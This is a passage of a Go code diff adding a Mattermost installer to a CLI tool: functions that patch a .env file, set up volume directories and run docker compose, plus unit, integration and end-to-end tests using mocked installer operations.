+func patchEnvWith(rc *eos_io.RuntimeContext, cfg *InstallConfig, ins *installer) error {
+ logger := otelzap.Ctx(rc.Ctx)
+
+ envPath := filepath.Join(InstallDir, EnvFileName)
+ envExamplePath := filepath.Join(InstallDir, EnvExampleFileName)
+
+ // Copy env.example to .env if .env doesn't exist
+ if _, err := ins.stat(envPath); os.IsNotExist(err) {
+ input, readErr := ins.readFile(envExamplePath)
+ if readErr != nil {
+ return fmt.Errorf("failed to read %s: %w\n"+
+ "Ensure the Mattermost repo was cloned correctly", envExamplePath, readErr)
+ }
+ if writeErr := ins.writeFile(envPath, input, EnvFilePerm); writeErr != nil {
+ return fmt.Errorf("failed to write %s: %w", envPath, writeErr)
+ }
+ logger.Info("Created .env from template", zap.String("path", envPath))
+ }
+
+ // Build overrides
+ overrides := make(map[string]string, len(DefaultEnvOverrides)+3)
+ for k, v := range DefaultEnvOverrides {
+ overrides[k] = v
+ }
+ overrides["PORT"] = strconv.Itoa(cfg.Port)
+ overrides["MM_SUPPORTSETTINGS_SUPPORTEMAIL"] = cfg.SupportEmail
+ if cfg.PostgresPassword != "" {
+ overrides["POSTGRES_PASSWORD"] = cfg.PostgresPassword
+ }
+
+ if err := ins.patchEnvFile(envPath, overrides); err != nil {
+ return fmt.Errorf("failed to patch .env: %w", err)
+ }
+
+ logger.Info("Configuration patched",
+ zap.String("path", envPath),
+ zap.Int("port", cfg.Port))
+
+ return nil
+}
+
+// ensureVolumesWith creates volume directories and sets ownership.
+func ensureVolumesWith(rc *eos_io.RuntimeContext, ins *installer) error {
+ logger := otelzap.Ctx(rc.Ctx)
+
+ base := filepath.Join(InstallDir, VolumesBaseDir)
+ for _, sub := range VolumeSubdirs {
+ dir := filepath.Join(base, sub)
+ if err := ins.mkdirAll(dir, VolumeDirPerm); err != nil {
+ return fmt.Errorf("failed to create volume directory %s: %w", dir, err)
+ }
+ }
+
+ if err := ins.chown(base, ContainerOwnership); err != nil {
+ return fmt.Errorf("failed to set volume ownership: %w\n"+
+ "Try: sudo chown -R %s %s", err, ContainerOwnership, base)
+ }
+
+ logger.Info("Volume directories ready",
+ zap.String("base", base),
+ zap.String("ownership", ContainerOwnership),
+ zap.Int("subdirs", len(VolumeSubdirs)))
+
+ return nil
+}
+
+// deployContainersWith runs docker compose up.
+func deployContainersWith(rc *eos_io.RuntimeContext, ins *installer) error {
+ logger := otelzap.Ctx(rc.Ctx)
+
+ // Ensure shared Docker network exists
+ if err := ins.ensureNetwork(rc); err != nil {
+ logger.Warn("Could not ensure arachne-net (non-fatal)", zap.Error(err))
+ }
+
+ logger.Info("Starting Mattermost containers",
+ zap.String("dir", InstallDir))
+
+ return ins.composeUp(rc, InstallDir)
+}
+
+// PatchEnvInPlace patches an .env file in-place with the given overrides.
+// Exported for use by the patch subpackage and tests.
+func PatchEnvInPlace(path string, updates map[string]string) error {
+ return patchEnvInPlace(path, updates)
+}
+
diff --git a/pkg/mattermost/install_e2e_test.go b/pkg/mattermost/install_e2e_test.go
new file mode 100644
index 000000000..b18e09d22
--- /dev/null
+++ b/pkg/mattermost/install_e2e_test.go
@@ -0,0 +1,72 @@
+//go:build e2e
+
+package mattermost
+
+import (
+ "os"
+ "os/exec"
+ "path/filepath"
+ "runtime"
+ "strings"
+ "testing"
+)
+
+// --- E2E smoke tests (test pyramid: e2e, 10% weight) ---
+// These tests verify the CLI command compiles and shows help.
+// They do NOT deploy actual containers.
+
+// repoRoot returns the git repository root for reliable path resolution.
+func repoRoot(t *testing.T) string {
+ t.Helper()
+ // Walk up from this file's directory to find go.mod
+ _, file, _, ok := runtime.Caller(0)
+ if !ok {
+ t.Fatal("cannot determine test file path")
+ }
+ dir := filepath.Dir(file)
+ for {
+ if _, err := os.Stat(filepath.Join(dir, "go.mod")); err == nil {
+ return dir
+ }
+ parent := filepath.Dir(dir)
+ if parent == dir {
+ t.Fatal("cannot find repo root (no go.mod found)")
+ }
+ dir = parent
+ }
+}
+
+func TestCreateMattermostCommand_Help(t *testing.T) {
+ root := repoRoot(t)
+ cmd := exec.Command("go", "run", filepath.Join(root, "cmd"), "create", "mattermost", "--help")
+ cmd.Dir = root
+ output, err := cmd.CombinedOutput()
+ if err != nil {
+ t.Fatalf("'eos create mattermost --help' failed: %v\nOutput: %s", err, output)
+ }
+
+ outputStr := string(output)
+ if len(outputStr) == 0 {
+ t.Error("help output should not be empty")
+ }
+ if !strings.Contains(outputStr, "mattermost") {
+ t.Error("help output should mention 'mattermost'")
+ }
+}
+
+func TestCreateMattermostCommand_DryRun_NonRoot(t *testing.T) {
+ root := repoRoot(t)
+ cmd := exec.Command("go", "run", filepath.Join(root, "cmd"), "create", "mattermost", "--dry-run")
+ cmd.Dir = root
+ output, err := cmd.CombinedOutput()
+
+ if err == nil {
+ t.Log("command succeeded (likely running as root in CI)")
+ return
+ }
+
+ outputStr := string(output)
+ if len(outputStr) == 0 {
+ t.Error("error output should explain the failure")
+ }
+}
diff --git a/pkg/mattermost/install_integration_test.go b/pkg/mattermost/install_integration_test.go
new file mode 100644
index 000000000..a99abd909
--- /dev/null
+++ b/pkg/mattermost/install_integration_test.go
@@ -0,0 +1,168 @@
+//go:build integration
+
+package mattermost
+
+import (
+ "context"
+ "os"
+ "path/filepath"
+ "strings"
+ "testing"
+
+ "github.com/CodeMonkeyCybersecurity/eos/pkg/eos_io"
+)
+
+// --- Integration tests (test pyramid: integration, 20% weight) ---
+// These tests exercise real filesystem operations but no external services.
+
+func TestInstallWith_DryRun_Integration(t *testing.T) {
+ rc := &eos_io.RuntimeContext{Ctx: context.Background()}
+ cfg := DefaultInstallConfig()
+ cfg.DryRun = true
+
+ ins := noopInstaller()
+
+ // DryRun should succeed even without Docker
+ if err := installWith(rc, cfg, ins); err != nil {
+ t.Fatalf("dry run should not error: %v", err)
+ }
+}
+
+func TestPatchEnvInPlace_RealisticEnvExample(t *testing.T) {
+ tmpDir := t.TempDir()
+
+ // Realistic env.example matching what Mattermost ships
+ envExample := `# Domain of service
+DOMAIN=mm.example.com
+
+# Container settings
+TZ=UTC
+
+# Postgres settings
+POSTGRES_USER=mmuser
+POSTGRES_PASSWORD=mmuser_password
+POSTGRES_DB=mattermost
+
+# Mattermost settings
+MM_BLEVESETTINGS_INDEXDIR=/mattermost/bleve-indexes
+MM_SERVICESETTINGS_SITEURL=https://mm.example.com
+
+#MATTERMOST_CONTAINER_READONLY=true
+
+PORT=8065
+
+MM_SQLSETTINGS_MAXIDLECONNS=20
+MM_SQLSETTINGS_MAXOPENCONNS=300
+
+MM_SUPPORTSETTINGS_SUPPORTEMAIL=support@example.com
+`
+ if err := os.WriteFile(filepath.Join(tmpDir, EnvExampleFileName), []byte(envExample), 0644); err != nil {
+ t.Fatalf("failed to create env.example: %v", err)
+ }
+
+ // Test PatchMattermostEnv directly
+ if err := PatchMattermostEnv(tmpDir); err != nil {
+ t.Fatalf("PatchMattermostEnv failed: %v", err)
+ }
+
+ envPath := filepath.Join(tmpDir, EnvFileName)
+ result, err := os.ReadFile(envPath)
+ if err != nil {
+ t.Fatalf("failed to read .env: %v", err)
+ }
+
+ resultStr := string(result)
+
+ if got := extractEnvValue(resultStr, "DOMAIN"); got != "localhost" {
+ t.Errorf("DOMAIN should be 'localhost', got %q", got)
+ }
+ if got := extractEnvValue(resultStr, "TZ"); got != "UTC" {
+ t.Errorf("TZ should be 'UTC', got %q", got)
+ }
+ if got := extractEnvValue(resultStr, "POSTGRES_USER"); got != "mmuser" {
+ t.Errorf("POSTGRES_USER should be preserved as 'mmuser', got %q", got)
+ }
+}
+
+func TestEnsureVolumesWith_Integration(t *testing.T) {
+ rc := &eos_io.RuntimeContext{Ctx: context.Background()}
+
+ // Track created directories
+ var createdDirs []string
+ ins := noopInstaller()
+ ins.mkdirAll = func(path string, _ os.FileMode) error {
+ createdDirs = append(createdDirs, path)
+ return nil
+ }
+
+ if err := ensureVolumesWith(rc, ins); err != nil {
+ t.Fatalf("ensureVolumesWith failed: %v", err)
+ }
+
+ if len(createdDirs) != len(VolumeSubdirs) {
+ t.Errorf("expected %d dirs created, got %d", len(VolumeSubdirs), len(createdDirs))
+ }
+}
+
+func TestInstallWith_FullPipeline_Integration(t *testing.T) {
+ rc := &eos_io.RuntimeContext{Ctx: context.Background()}
+ cfg := DefaultInstallConfig()
+ cfg.PostgresPassword = "integration-test-pass"
+
+ // Track all operations
+ var ops []string
+ ins := noopInstaller()
+ ins.gitClone = func(_, _ string) error {
+ ops = append(ops, "clone")
+ return nil
+ }
+ ins.mkdirP = func(_ *eos_io.RuntimeContext, _ string, _ os.FileMode) error {
+ ops = append(ops, "mkdir")
+ return nil
+ }
+ ins.copyR = func(_ *eos_io.RuntimeContext, _, _ string) error {
+ ops = append(ops, "copy")
+ return nil
+ }
+ ins.readFile = func(_ string) ([]byte, error) {
+ return []byte("DOMAIN=x\nPORT=8065\n"), nil
+ }
+ ins.chown = func(_, _ string) error {
+ ops = append(ops, "chown")
+ return nil
+ }
+ ins.composeUp = func(_ *eos_io.RuntimeContext, _ string) error {
+ ops = append(ops, "compose")
+ return nil
+ }
+
+ if err := installWith(rc, cfg, ins); err != nil {
+ t.Fatalf("installWith failed: %v", err)
+ }
+
+ // Verify operations happened in correct order
+ expectedOrder := []string{"clone", "mkdir", "copy", "chown", "compose"}
+ if len(ops) != len(expectedOrder) {
+ t.Fatalf("expected %d ops, got %d: %v", len(expectedOrder), len(ops), ops)
+ }
+ for i, expected := range expectedOrder {
+ if ops[i] != expected {
+ t.Errorf("operation %d: want %q, got %q (full: %v)", i, expected, ops[i], ops)
+ }
+ }
+}
+
+// --- Test helpers ---
+
+func extractEnvValue(content, key string) string {
+ for _, line := range strings.Split(content, "\n") {
+ if len(line) > 0 && line[0] != '#' {
+ if idx := strings.Index(line, "="); idx > 0 {
+ if line[:idx] == key {
+ return line[idx+1:]
+ }
+ }
+ }
+ }
+ return ""
+}
diff --git a/pkg/mattermost/install_test.go b/pkg/mattermost/install_test.go
new file mode 100644
index 000000000..23c3d752c
--- /dev/null
+++ b/pkg/mattermost/install_test.go
@@ -0,0 +1,866 @@
+package mattermost
+
+import (
+ "context"
+ "errors"
+ "fmt"
+ "os"
+ "path/filepath"
+ "strings"
+ "testing"
+
+ "github.com/CodeMonkeyCybersecurity/eos/pkg/eos_io"
+)
+
+// --- Test helpers ---
+
+// testRC creates a minimal RuntimeContext for testing.
+func testRC() *eos_io.RuntimeContext {
+ return &eos_io.RuntimeContext{
+ Ctx: context.Background(),
+ }
+}
+
+// noopInstaller returns an installer where all operations succeed.
+func noopInstaller() *installer {
+ return &installer{
+ checkDocker: func(_ *eos_io.RuntimeContext) error { return nil },
+ gitClone: func(_, _ string) error { return nil },
+ mkdirP: func(_ *eos_io.RuntimeContext, _ string, _ os.FileMode) error { return nil },
+ copyR: func(_ *eos_io.RuntimeContext, _, _ string) error { return nil },
+ removeAll: func(_ string) error { return nil },
+ chown: func(_, _ string) error { return nil },
+ ensureNetwork: func(_ *eos_io.RuntimeContext) error { return nil },
+ composeUp: func(_ *eos_io.RuntimeContext, _ string) error { return nil },
+ checkContainers: func(_ *eos_io.RuntimeContext) error { return nil },
+ stat: func(_ string) (os.FileInfo, error) { return nil, os.ErrNotExist },
+ readFile: func(_ string) ([]byte, error) { return nil, os.ErrNotExist },
+ writeFile: func(_ string, _ []byte, _ os.FileMode) error { return nil },
+ patchEnvFile: func(_ string, _ map[string]string) error { return nil },
+ mkdirAll: func(_ string, _ os.FileMode) error { return nil },
+ }
+}
+
+// --- Unit tests: InstallConfig ---
+
+func TestDefaultInstallConfig(t *testing.T) {
+ cfg := DefaultInstallConfig()
+
+ if cfg.Port != DefaultPort {
+ t.Errorf("default port = %d, want %d", cfg.Port, DefaultPort)
+ }
+ if cfg.SupportEmail != DefaultSupportEmail {
+ t.Errorf("default support email = %q, want %q", cfg.SupportEmail, DefaultSupportEmail)
+ }
+ if cfg.PostgresPassword != "" {
+ t.Error("default postgres password should be empty (auto-generated)")
+ }
+ if cfg.DryRun {
+ t.Error("default DryRun should be false")
+ }
+}
+
+func TestInstallConfigValidate_ValidConfig(t *testing.T) {
+ cfg := DefaultInstallConfig()
+ if err := cfg.Validate(); err != nil {
+ t.Errorf("valid config should not error: %v", err)
+ }
+}
+
+func TestInstallConfigValidate_InvalidPort(t *testing.T) {
+ tests := []struct {
+ name string
+ port int
+ }{
+ {"zero", 0},
+ {"negative", -1},
+ {"too_high", 65536},
+ {"way_too_high", 100000},
+ }
+
+ for _, tc := range tests {
+ t.Run(tc.name, func(t *testing.T) {
+ cfg := DefaultInstallConfig()
+ cfg.Port = tc.port
+ if err := cfg.Validate(); err == nil {
+ t.Errorf("port %d should fail validation", tc.port)
+ }
+ })
+ }
+}
+
+func TestInstallConfigValidate_ValidPorts(t *testing.T) {
+ validPorts := []int{1, 80, 443, 8017, 8065, 65535}
+ for _, port := range validPorts {
+ cfg := DefaultInstallConfig()
+ cfg.Port = port
+ if err := cfg.Validate(); err != nil {
+ t.Errorf("port %d should be valid: %v", port, err)
+ }
+ }
+}
+
+// --- Unit tests: actionDescription ---
+
+func TestActionDescription(t *testing.T) {
+ fresh := actionDescription(false)
+ if !strings.Contains(fresh, "fresh") {
+ t.Errorf("fresh install description should mention 'fresh', got %q", fresh)
+ }
+
+ existing := actionDescription(true)
+ if !strings.Contains(existing, "update") {
+ t.Errorf("existing deployment description should mention 'update', got %q", existing)
+ }
+}
+
+// --- Unit tests: isAlreadyDeployedWith ---
+
+func TestIsAlreadyDeployedWith_NotDeployed(t *testing.T) {
+ ins := noopInstaller()
+ ins.stat = func(_ string) (os.FileInfo, error) {
+ return nil, os.ErrNotExist
+ }
+ if isAlreadyDeployedWith(ins) {
+ t.Error("should return false when compose file doesn't exist")
+ }
+}
+
+func TestIsAlreadyDeployedWith_Deployed(t *testing.T) {
+ ins := noopInstaller()
+ ins.stat = func(_ string) (os.FileInfo, error) {
+ return nil, nil // exists
+ }
+ if !isAlreadyDeployedWith(ins) {
+ t.Error("should return true when compose file exists")
+ }
+}
+
+// --- Unit tests: installWith (full pipeline) ---
+
+func TestInstallWith_FreshInstall(t *testing.T) {
+ rc := testRC()
+ cfg := DefaultInstallConfig()
+ cfg.PostgresPassword = "test-password"
+
+ ins := noopInstaller()
+
+ var cloned, mkdird, copied, chowned, networked, composed, checked bool
+
+ ins.gitClone = func(url, _ string) error {
+ if url != RepoURL {
+ t.Errorf("unexpected clone URL: %s", url)
+ }
+ cloned = true
+ return nil
+ }
+ ins.mkdirP = func(_ *eos_io.RuntimeContext, _ string, _ os.FileMode) error {
+ mkdird = true
+ return nil
+ }
+ ins.copyR = func(_ *eos_io.RuntimeContext, _, _ string) error {
+ copied = true
+ return nil
+ }
+ ins.stat = func(path string) (os.FileInfo, error) {
+ return nil, os.ErrNotExist // nothing exists
+ }
+ ins.readFile = func(path string) ([]byte, error) {
+ if strings.HasSuffix(path, EnvExampleFileName) {
+ return []byte("DOMAIN=example.com\nPORT=8065\n"), nil
+ }
+ return nil, os.ErrNotExist
+ }
+ ins.writeFile = func(_ string, _ []byte, _ os.FileMode) error {
+ return nil
+ }
+ ins.chown = func(_, _ string) error {
+ chowned = true
+ return nil
+ }
+ ins.ensureNetwork = func(_ *eos_io.RuntimeContext) error {
+ networked = true
+ return nil
+ }
+ ins.composeUp = func(_ *eos_io.RuntimeContext, _ string) error {
+ composed = true
+ return nil
+ }
+ ins.checkContainers = func(_ *eos_io.RuntimeContext) error {
+ checked = true
+ return nil
+ }
+
+ if err := installWith(rc, cfg, ins); err != nil {
+ t.Fatalf("installWith failed: %v", err)
+ }
+
+ if !cloned {
+ t.Error("git clone was not called for fresh install")
+ }
+ if !mkdird {
+ t.Error("mkdirP was not called")
+ }
+ if !copied {
+ t.Error("copyR was not called")
+ }
+ if !chowned {
+ t.Error("chown was not called")
+ }
+ if !networked {
+ t.Error("ensureNetwork was not called")
+ }
+ if !composed {
+ t.Error("composeUp was not called")
+ }
+ if !checked {
+ t.Error("checkContainers was not called")
+ }
+}
+
+func TestInstallWith_ExistingDeployment(t *testing.T) {
+ rc := testRC()
+ cfg := DefaultInstallConfig()
+ cfg.PostgresPassword = "test-password"
+
+ ins := noopInstaller()
+ var cloned bool
+ ins.gitClone = func(_, _ string) error {
+ cloned = true
+ return nil
+ }
+
+ ins.stat = func(path string) (os.FileInfo, error) {
+ if strings.HasSuffix(path, ComposeFileName) {
+ return nil, nil // exists
+ }
+ if strings.HasSuffix(path, EnvFileName) {
+ return nil, nil // .env exists too
+ }
+ return nil, os.ErrNotExist
+ }
+
+ if err := installWith(rc, cfg, ins); err != nil {
+ t.Fatalf("installWith failed: %v", err)
+ }
+
+ if cloned {
+ t.Error("git clone should NOT be called for existing deployment")
+ }
+}
+
+func TestInstallWith_DryRun(t *testing.T) {
+ rc := testRC()
+ cfg := DefaultInstallConfig()
+ cfg.DryRun = true
+
+ ins := noopInstaller()
+ var composed bool
+ ins.composeUp = func(_ *eos_io.RuntimeContext, _ string) error {
+ composed = true
+ return nil
+ }
+
+ if err := installWith(rc, cfg, ins); err != nil {
+ t.Fatalf("dry run should not error: %v", err)
+ }
+
+ if composed {
+ t.Error("composeUp should NOT be called during dry run")
+ }
+}
+
+func TestInstallWith_DryRunAlreadyDeployed(t *testing.T) {
+ rc := testRC()
+ cfg := DefaultInstallConfig()
+ cfg.DryRun = true
+
+ ins := noopInstaller()
+ ins.stat = func(path string) (os.FileInfo, error) {
+ if strings.HasSuffix(path, ComposeFileName) {
+ return nil, nil // exists
+ }
+ return nil, os.ErrNotExist
+ }
+
+ if err := installWith(rc, cfg, ins); err != nil {
+ t.Fatalf("dry run with existing deployment should not error: %v", err)
+ }
+}
+
+func TestInstallWith_InvalidConfig(t *testing.T) {
+ rc := testRC()
+ cfg := DefaultInstallConfig()
+ cfg.Port = -1
+
+ ins := noopInstaller()
+
+ if err := installWith(rc, cfg, ins); err == nil {
+ t.Error("should fail with invalid port")
+ }
+}
+
+func TestInstallWith_DockerNotInstalled(t *testing.T) {
+ rc := testRC()
+ cfg := DefaultInstallConfig()
+
+ ins := noopInstaller()
+ ins.checkDocker = func(_ *eos_io.RuntimeContext) error {
+ return errors.New("docker not found")
+ }
+
+ err := installWith(rc, cfg, ins)
+ if err == nil {
+ t.Fatal("should fail when docker is not installed")
+ }
+ if !strings.Contains(err.Error(), "docker is required") {
+ t.Errorf("error should mention docker requirement, got: %v", err)
+ }
+}
+
+func TestInstallWith_CloneFails(t *testing.T) {
+ rc := testRC()
+ cfg := DefaultInstallConfig()
+
+ ins := noopInstaller()
+ ins.gitClone = func(_, _ string) error {
+ return errors.New("network unreachable")
+ }
+
+ err := installWith(rc, cfg, ins)
+ if err == nil {
+ t.Fatal("should fail when clone fails")
+ }
+ if !strings.Contains(err.Error(), "git clone failed") {
+ t.Errorf("error should mention git clone failure, got: %v", err)
+ }
+}
+
+func TestInstallWith_MkdirFails(t *testing.T) {
+ rc := testRC()
+ cfg := DefaultInstallConfig()
+
+ ins := noopInstaller()
+ ins.mkdirP = func(_ *eos_io.RuntimeContext, _ string, _ os.FileMode) error {
+ return errors.New("permission denied")
+ }
+
+ err := installWith(rc, cfg, ins)
+ if err == nil {
+ t.Fatal("should fail when mkdir fails")
+ }
+ if !strings.Contains(err.Error(), "install directory") {
+ t.Errorf("error should mention install directory, got: %v", err)
+ }
+}
+
+func TestInstallWith_CopyFails(t *testing.T) {
+ rc := testRC()
+ cfg := DefaultInstallConfig()
+
+ ins := noopInstaller()
+ ins.copyR = func(_ *eos_io.RuntimeContext, _, _ string) error {
+ return errors.New("disk full")
+ }
+
+ err := installWith(rc, cfg, ins)
+ if err == nil {
+ t.Fatal("should fail when copy fails")
+ }
+ if !strings.Contains(err.Error(), "copy files") {
+ t.Errorf("error should mention copy failure, got: %v", err)
+ }
+}
+
+func TestInstallWith_ChownFails(t *testing.T) {
+ rc := testRC()
+ cfg := DefaultInstallConfig()
+
+ ins := noopInstaller()
+ ins.readFile = func(_ string) ([]byte, error) {
+ return []byte("DOMAIN=x\n"), nil
+ }
+ ins.chown = func(_, _ string) error {
+ return errors.New("operation not permitted")
+ }
+
+ err := installWith(rc, cfg, ins)
+ if err == nil {
+ t.Fatal("should fail when chown fails")
+ }
+ if !strings.Contains(err.Error(), "volume ownership") {
+ t.Errorf("error should mention volume ownership, got: %v", err)
+ }
+}
+
+func TestInstallWith_ComposeUpFails(t *testing.T) {
+ rc := testRC()
+ cfg := DefaultInstallConfig()
+
+ ins := noopInstaller()
+ ins.readFile = func(_ string) ([]byte, error) {
+ return []byte("DOMAIN=x\n"), nil
+ }
+ ins.composeUp = func(_ *eos_io.RuntimeContext, _ string) error {
+ return errors.New("compose failed")
+ }
+
+ err := installWith(rc, cfg, ins)
+ if err == nil {
+ t.Fatal("should fail when compose up fails")
+ }
+ if !strings.Contains(err.Error(), "deploy containers") {
+ t.Errorf("error should mention container deployment, got: %v", err)
+ }
+}
+
+func TestInstallWith_ContainerCheckWarningNonFatal(t *testing.T) {
+ rc := testRC()
+ cfg := DefaultInstallConfig()
+
+ ins := noopInstaller()
+ ins.readFile = func(_ string) ([]byte, error) {
+ return []byte("DOMAIN=x\n"), nil
+ }
+ ins.checkContainers = func(_ *eos_io.RuntimeContext) error {
+ return errors.New("some containers unhealthy")
+ }
+
+ if err := installWith(rc, cfg, ins); err != nil {
+ t.Fatalf("container check warning should be non-fatal: %v", err)
+ }
+}
+
+func TestInstallWith_NetworkFailureNonFatal(t *testing.T) {
+ rc := testRC()
+ cfg := DefaultInstallConfig()
+
+ ins := noopInstaller()
+ ins.readFile = func(_ string) ([]byte, error) {
+ return []byte("DOMAIN=x\n"), nil
+ }
+ ins.ensureNetwork = func(_ *eos_io.RuntimeContext) error {
+ return errors.New("network creation failed")
+ }
+
+ if err := installWith(rc, cfg, ins); err != nil {
+ t.Fatalf("network failure should be non-fatal: %v", err)
+ }
+}
+
+func TestInstallWith_EnvExampleReadFails(t *testing.T) {
+ rc := testRC()
+ cfg := DefaultInstallConfig()
+
+ ins := noopInstaller()
+ ins.readFile = func(_ string) ([]byte, error) {
+ return nil, errors.New("file not found")
+ }
+
+ err := installWith(rc, cfg, ins)
+ if err == nil {
+ t.Fatal("should fail when env.example can't be read")
+ }
+}
+
+func TestInstallWith_EnvWriteFails(t *testing.T) {
+ rc := testRC()
+ cfg := DefaultInstallConfig()
+
+ ins := noopInstaller()
+ ins.readFile = func(_ string) ([]byte, error) {
+ return []byte("DOMAIN=x\n"), nil
+ }
+ ins.writeFile = func(_ string, _ []byte, _ os.FileMode) error {
+ return errors.New("disk full")
+ }
+
+ err := installWith(rc, cfg, ins)
+ if err == nil {
+ t.Fatal("should fail when .env can't be written")
+ }
+}
+
+// --- Unit tests: patchEnvInPlace ---
+
+func TestInstallWith_ExistingDeployment_PatchFails(t *testing.T) {
+ rc := testRC()
+ cfg := DefaultInstallConfig()
+ cfg.PostgresPassword = "test-password"
+
+ ins := noopInstaller()
+ ins.stat = func(path string) (os.FileInfo, error) {
+ if strings.HasSuffix(path, ComposeFileName) {
+ return nil, nil // compose exists = already deployed
+ }
+ if strings.HasSuffix(path, EnvFileName) {
+ return nil, os.ErrNotExist // .env doesn't exist
+ }
+ return nil, os.ErrNotExist
+ }
+ ins.readFile = func(_ string) ([]byte, error) {
+ return nil, errors.New("env.example missing")
+ }
+
+ err := installWith(rc, cfg, ins)
+ if err == nil {
+ t.Fatal("should fail when existing deployment patch fails")
+ }
+ if !strings.Contains(err.Error(), "update configuration") {
+ t.Errorf("error should mention update configuration, got: %v", err)
+ }
+}
+
+func TestInstallWith_VolumeMkdirAllFails(t *testing.T) {
+ rc := testRC()
+ cfg := DefaultInstallConfig()
+
+ ins := noopInstaller()
+ ins.readFile = func(_ string) ([]byte, error) {
+ return []byte("DOMAIN=x\n"), nil
+ }
+ ins.mkdirAll = func(_ string, _ os.FileMode) error {
+ return errors.New("permission denied")
+ }
+
+ err := installWith(rc, cfg, ins)
+ if err == nil {
+ t.Fatal("should fail when volume mkdirAll fails")
+ }
+ if !strings.Contains(err.Error(), "volume") {
+ t.Errorf("error should mention volume, got: %v", err)
+ }
+}
+
+func TestPatchEnvInPlace_Basic(t *testing.T) {
+ tmpDir := t.TempDir()
+ envPath := filepath.Join(tmpDir, ".env")
+
+ content := "DOMAIN=old.example.com\nPORT=8065\nOTHER=keep\n"
+ if err := os.WriteFile(envPath, []byte(content), 0644); err != nil {
+ t.Fatalf("failed to write test .env: %v", err)
+ }
+
+ updates := map[string]string{
+ "DOMAIN": "localhost",
+ "PORT": "8017",
+ }
+
+ if err := patchEnvInPlace(envPath, updates); err != nil {
+ t.Fatalf("patchEnvInPlace failed: %v", err)
+ }
+
+ result, err := os.ReadFile(envPath)
+ if err != nil {
+ t.Fatalf("failed to read patched .env: %v", err)
+ }
+
+ resultStr := string(result)
+ if !strings.Contains(resultStr, "DOMAIN=localhost") {
+ t.Error("DOMAIN should be patched to 'localhost'")
+ }
+ if !strings.Contains(resultStr, "PORT=8017") {
+ t.Error("PORT should be patched to '8017'")
+ }
+ if !strings.Contains(resultStr, "OTHER=keep") {
+ t.Error("OTHER should be preserved")
+ }
+}
+
+func TestPatchEnvInPlace_CommentedKeys(t *testing.T) {
+ tmpDir := t.TempDir()
+ envPath := filepath.Join(tmpDir, ".env")
+
+ content := "#DOMAIN=localhost\n#PORT=8065\nACTIVE=yes\n"
+ if err := os.WriteFile(envPath, []byte(content), 0644); err != nil {
+ t.Fatalf("failed to write test .env: %v", err)
+ }
+
+ updates := map[string]string{
+ "DOMAIN": "chat.example.com",
+ "PORT": "8017",
+ }
+
+ if err := patchEnvInPlace(envPath, updates); err != nil {
+ t.Fatalf("patchEnvInPlace failed: %v", err)
+ }
+
+ result, err := os.ReadFile(envPath)
+ if err != nil {
+ t.Fatalf("failed to read patched .env: %v", err)
+ }
+
+ resultStr := string(result)
+ if !strings.Contains(resultStr, "DOMAIN=chat.example.com") {
+ t.Errorf("commented DOMAIN should be patched, got: %s", resultStr)
+ }
+ if !strings.Contains(resultStr, "PORT=8017") {
+ t.Errorf("commented PORT should be patched, got: %s", resultStr)
+ }
+ if strings.Contains(resultStr, "#DOMAIN") {
+ t.Error("patched DOMAIN should not be commented")
+ }
+}
+
+func TestPatchEnvInPlace_MissingKeysAppended(t *testing.T) {
+ tmpDir := t.TempDir()
+ envPath := filepath.Join(tmpDir, ".env")
+
+ content := "EXISTING=value\n"
+ if err := os.WriteFile(envPath, []byte(content), 0644); err != nil {
+ t.Fatalf("failed to write test .env: %v", err)
+ }
+
+ updates := map[string]string{
+ "NEWKEY": "newvalue",
+ }
+
+ if err := patchEnvInPlace(envPath, updates); err != nil {
+ t.Fatalf("patchEnvInPlace should append missing keys: %v", err)
+ }
+
+ result, err := os.ReadFile(envPath)
+ if err != nil {
+ t.Fatalf("failed to read .env: %v", err)
+ }
+ resultStr := string(result)
+ if !strings.Contains(resultStr, "EXISTING=value") {
+ t.Error("existing content should be preserved")
+ }
+ if !strings.Contains(resultStr, "NEWKEY=newvalue") {
+ t.Error("missing key should be appended")
+ }
+}
+
+func TestPatchEnvInPlace_EmptyFile_AppendsKeys(t *testing.T) {
+ tmpDir := t.TempDir()
+ envPath := filepath.Join(tmpDir, ".env")
+
+ if err := os.WriteFile(envPath, []byte(""), 0644); err != nil {
+ t.Fatalf("failed to write empty .env: %v", err)
+ }
+
+ updates := map[string]string{"KEY": "value"}
+ if err := patchEnvInPlace(envPath, updates); err != nil {
+ t.Fatalf("patchEnvInPlace should handle empty file: %v", err)
+ }
+
+ result, err := os.ReadFile(envPath)
+ if err != nil {
+ t.Fatalf("failed to read .env: %v", err)
+ }
+ if !strings.Contains(string(result), "KEY=value") {
+ t.Error("key should be appended to empty file")
+ }
+}
+
+func TestPatchEnvInPlace_NonexistentFile(t *testing.T) {
+ err := patchEnvInPlace("/nonexistent/path/.env", map[string]string{"KEY": "val"})
+ if err == nil {
+ t.Error("should error on nonexistent file")
+ }
+}
+
+func TestPatchEnvInPlace_PreservesBlankLines(t *testing.T) {
+ tmpDir := t.TempDir()
+ envPath := filepath.Join(tmpDir, ".env")
+
+ content := "FIRST=one\n\nSECOND=two\n\n# comment\nTHIRD=three\n"
+ if err := os.WriteFile(envPath, []byte(content), 0644); err != nil {
+ t.Fatalf("failed to write .env: %v", err)
+ }
+
+ updates := map[string]string{"SECOND": "patched"}
+ if err := patchEnvInPlace(envPath, updates); err != nil {
+ t.Fatalf("patchEnvInPlace failed: %v", err)
+ }
+
+ result, err := os.ReadFile(envPath)
+ if err != nil {
+ t.Fatalf("failed to read .env: %v", err)
+ }
+
+ resultStr := string(result)
+ if !strings.Contains(resultStr, "SECOND=patched") {
+ t.Error("SECOND should be patched")
+ }
+ if !strings.Contains(resultStr, "FIRST=one") {
+ t.Error("FIRST should be preserved")
+ }
+ if !strings.Contains(resultStr, "THIRD=three") {
+ t.Error("THIRD should be preserved")
+ }
+}
+
+func TestPatchEnvInPlace_EqualsInValue(t *testing.T) {
+ tmpDir := t.TempDir()
+ envPath := filepath.Join(tmpDir, ".env")
+
+ content := "DSN=postgres://user:pass@host:5432/db?ssl=true\nOTHER=val\n"
+ if err := os.WriteFile(envPath, []byte(content), 0644); err != nil {
+ t.Fatalf("failed to write .env: %v", err)
+ }
+
+ updates := map[string]string{"OTHER": "new_val"}
+ if err := patchEnvInPlace(envPath, updates); err != nil {
+ t.Fatalf("patchEnvInPlace failed: %v", err)
+ }
+
+ result, err := os.ReadFile(envPath)
+ if err != nil {
+ t.Fatalf("failed to read .env: %v", err)
+ }
+
+ resultStr := string(result)
+ if !strings.Contains(resultStr, "DSN=postgres://user:pass@host:5432/db?ssl=true") {
